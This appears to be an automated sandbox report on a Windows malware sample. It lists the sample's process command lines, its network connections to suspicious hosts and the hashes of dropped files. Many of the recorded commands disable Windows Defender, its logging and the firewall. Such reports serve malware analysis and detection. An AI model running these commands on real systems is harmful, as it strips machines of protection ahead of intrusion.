C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f4272139-aacd-4eb0-abeb-3e41dc01529c}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4caa7d59-2c60-49b6-8c4e-9ee1e261b434}

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv rxwFBNp42kmv9L8vTNvaXw.0.2

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18f81da6.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\396d7b93.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\45fa18db.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Network

Country Destination Domain Proto
GB 95.101.63.203:443 www.bing.com tcp
GB 95.101.63.203:443 www.bing.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 208.95.112.1:80 ip-api.com tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 grayhatgroupontop.zapto.org udp
EG 197.160.170.172:1177 grayhatgroupontop.zapto.org tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp
US 3.229.117.57:799 ddos.dnsnb8.net tcp

Files

memory/5408-0-0x00007FFDE4843000-0x00007FFDE4845000-memory.dmp

memory/5408-1-0x0000000000D50000-0x0000000000D9E000-memory.dmp

memory/5408-2-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

memory/3000-3-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnb0av0e.gab.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3000-9-0x00000282FD3A0000-0x00000282FD3C2000-memory.dmp

memory/3000-10-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

memory/3000-15-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

memory/3000-16-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

memory/3000-19-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

C:\Users\Admin\AppData\Roaming\x69.exe

MD5 143b1a26c0fdda10f74ba1b6249e020a
SHA1 30a01b28f4f205bc594f8d6665963eaa49d172e3
SHA256 83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65
SHA512 06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

memory/1008-25-0x0000000000E90000-0x0000000000EA8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 029fbf628b046653ab7ff10b31deeeb2
SHA1 93c2cb1905c8f5e71f5ea97a1e8a8c891eae077c
SHA256 85f6b0971e94daf9fd4e39413824f162851a9f5ce7f989bd92c903a4dbcbef26
SHA512 d4e3626dba2572bd1e53446b384962f955cc0c7e56a72cacf50a845d74714ec1020bcb0fdcc50636a1dfd4f08dc34143dbb5638dd90180df6aa31dab9228c98c

C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

MD5 22d6b7ab5c8a05162d36d2981b715c28
SHA1 7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3
SHA256 f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1
SHA512 374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

memory/5740-47-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

memory/5408-56-0x00007FFDE4843000-0x00007FFDE4845000-memory.dmp

memory/2700-57-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/640-59-0x00000000003E0000-0x00000000003E9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef72c47dbfaae0b9b0d09f22ad4afe20
SHA1 5357f66ba69b89440b99d4273b74221670129338
SHA256 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA512 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

C:\Users\Admin\AppData\Local\Temp\07C96AED.exe

MD5 69691c7bdcc3ce6d5d8a1361f22d04ac
SHA1 c63ae6dd4fc9f9dda66970e827d13f7c73fe841c
SHA256 08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1
SHA512 253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\49UOMM1O\k1[2].rar

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

C:\Users\Admin\AppData\Local\Temp\923D.tmp\923E.tmp\923F.bat

MD5 2df9441936169e60a9631bf730cd4273
SHA1 979ee79524023a77b9577d077a3472b87fda9834
SHA256 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e
SHA512 ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 18470dd1aa7811c5a9825ea59429223b
SHA1 75859ea7baf1a8f5ba652ca783bb15f07615cc32
SHA256 98616a32e387ad9ae2f6faddc53cd60e0ba50fe4088abdc51b82b309cc8771bd
SHA512 cc8ff35595460d3ef16589cbab347ac07eff8b62766bfbceb386507ac631d433a2aa9187b0d6cef2b30b1fa08c92bc5a0061e984cc37c378119dcf51212f3def

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cae60f0ddddac635da71bba775a2c5b4
SHA1 386f1a036af61345a7d303d45f5230e2df817477
SHA256 b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

C:\Users\Admin\AppData\Roaming\x69install.exe

MD5 b89953da384c6a80b03e5b3abece33c9
SHA1 8495ca680bc958f7b1c5525c2e92200fc9fa1864
SHA256 5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346
SHA512 8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

memory/5408-145-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

memory/4472-147-0x0000000000F90000-0x0000000000F99000-memory.dmp

memory/4588-146-0x0000000000B50000-0x0000000000B81000-memory.dmp

C:\Program Files\7-Zip\Uninstall.exe

MD5 405c009705fcdc96c87578c57acccf0c
SHA1 1fa7e550b30f2c4261c70804e17691841b9a6d2b
SHA256 bfb7d35e37adabb0647e854d881bce44f69dc63cd3447b08c086254cd1a4e5ae
SHA512 e5377852087335bed3c8598425f5398b9eded1cebba01358f54147d7fc7f54adcce7a3281005c94948e706314a3a652d1cbc2d8e013a5e44439aa217840ea986

memory/2356-160-0x0000000000B50000-0x0000000000B81000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 04114c0529b116bf66d764ff6a5a8fe3
SHA1 0caeff17d1b2190f76c9bf539105f6c40c92bd14
SHA256 fd7092b4e273314186bad6ce71aa4cd69450736b6ec6cc746868997ff82a7532
SHA512 6a718c330824346606ef24f71cca6be0bfafc626b1d2b060b36e919ab07f3d6a345f56cace8a5a84ffbe2183976eb197842c9fd2f3e3b8c8dd307057d59d6f26

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e3161f4edbc9b963debe22e29658050b
SHA1 45dbf88dadafe5dd1cfee1e987c8a219d3208cdb
SHA256 1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
SHA512 006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbb22d95851b93abf2afe8fb96a8e544
SHA1 920ec5fdb323537bcf78f7e29a4fc274e657f7a4
SHA256 e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465
SHA512 16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7617aaec2e7f76b18bf7cb267ba9ffee
SHA1 32ce7ba27edd8ca452c6bd303fbab2fac651edcb
SHA256 462808192f94709ea51d6cc2cf9477692b576ced96f16278b4d5d3c115257e42
SHA512 db00784bc8b098281dab7be9e3c7eb208cb116a7034c72f8187126cab37cbbc61d33f273d12830229d288862ba04424dc886b4b6bc760f501861c6134e804620

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba169f4dcbbf147fe78ef0061a95e83b
SHA1 92a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA256 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA512 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

memory/5740-318-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 49ef5aaa2f6339dfabb8f3e0cf119c52
SHA1 d6ee05dc442fbab25b94feb3cc8d924d3a17e3e7
SHA256 eaf3f4e0f03127cf39bd880c27cf370ea606ee43805c6383b50cff0283d85126
SHA512 f8adeeb12eca228af0c9373c876ac96586d362aeed071dbe84f4750cb599ec2149dac216bcc92629c37e872132be80c336bc6361568371f0ec0d808b7073321b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 04f1d68afbed6b13399edfae1e9b1472
SHA1 8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0
SHA256 f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de
SHA512 30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c65738617888921a153bd9b1ef516ee7
SHA1 5245e71ea3c181d76320c857b639272ac9e079b1
SHA256 4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
SHA512 2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

memory/4844-384-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c1a54dd5a1ab44cc4c4afd42f291c863
SHA1 b77043ab3582680fc96192e9d333a6be0ae0f69d
SHA256 c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
SHA512 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 217d9191dfd67252cef23229676c9eda
SHA1 80d940b01c28e3933b9d68b3e567adc2bac1289f
SHA256 e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
SHA512 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dcc3133a2a20a294255a82d2b97c61c7
SHA1 53d0acdc354df3f3df9879aaf349cafdd24c12f4
SHA256 cf462864912a95f27b59b1f1818a3e615db55646315dc6fb9742d199345ff207
SHA512 06c50d23012cc6a84c99ba7c98903d6e379eaf6cc87af67580254a938aaf70d91556fb8efe52f0fa097629591023efb8568e85069a9f1c3a3c8bff463247e8c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bff40f276a226f034b787f99c89265e2
SHA1 d76b2a597bb086596be9e7e623fa3a7cbcd6010f
SHA256 a2a13ef5026666b04db2d8db530a9eebccc5058e9241427a8d6703bc90eaa002
SHA512 f040f085451b7a415f64a16fcd25487abe8465e7d5654a2edb65d1502cfd8df1dd979855178965df12f4bb9f50c9f58ecafe6bb72dc1dd7c7d9758f4b2e4e458

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

